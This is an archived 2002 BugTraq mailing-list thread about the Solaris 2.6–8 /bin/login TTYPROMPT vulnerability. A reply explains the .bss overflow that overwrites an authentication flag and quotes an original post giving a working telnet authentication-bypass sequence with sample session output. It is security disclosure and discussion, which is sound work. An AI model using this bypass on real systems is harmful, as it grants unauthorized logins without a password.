RE: Solaris 2.6, 7, 8

From: Sinan Eren (SErenat_private)
Date: Wed Oct 02 2002 - 13:04:27 PDT

Next message: Daniel Woods: "Re: Postnuke XSS fixed"

Previous message: David Endler: "iDEFENSE Security Advisory 10.02.2002: Net-SNMP DoS Vulnerability"
Maybe in reply to: Jonathan S: "Solaris 2.6, 7, 8"
Next in thread: Roy Kidder: "Re: Solaris 2.6, 7, 8"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

the problem is there exists an authentication flag called the "fflag" just after the array that gets overflowed in the .bss segment. this is an array of char pointers so when it is overflowed becuase of an mismanagement on the indexing of this array the fflag gets overwritten with an valid address on .bss segment. this is good enough to satify the if(fflag) condition and spawn a shell.

some truth about this finding;
There is an exploit out in the wild for sometime and the example pattern shown by Jonathan is exactly thesame with the payload of that exploit. so i'm curious about this findings origin, i think credits must be given due... i'll be waiting for a clerification form Mr. Stuart. 

thanks,
sinan

-----Original Message-----
From: Jonathan S [mailto:jsat_private]
Sent: Wednesday, October 02, 2002 9:13 AM
To: bugtraqat_private
Subject: Solaris 2.6, 7, 8


Hello,

  Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT.  This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
  However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists.  The exploit requires the attacker to
simply define the environment variable TTYPROMPT to a 6 character string,
inside telnet. I believe this overflows an integer inside login, which
specifies whether or not the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by
64 " c"s, and a literal "\n".  You will then be logged in as the user
without any password authentication.  This should work with any account
except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

Jonathan Stuart
Network Security Engineer
Computer Consulting Partners, Ltd.
E-mail: jonsat_private

Next message: Daniel Woods: "Re: Postnuke XSS fixed"
Previous message: David Endler: "iDEFENSE Security Advisory 10.02.2002: Net-SNMP DoS Vulnerability"
Maybe in reply to: Jonathan S: "Solaris 2.6, 7, 8"
Next in thread: Roy Kidder: "Re: Solaris 2.6, 7, 8"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 14:41:19 PDT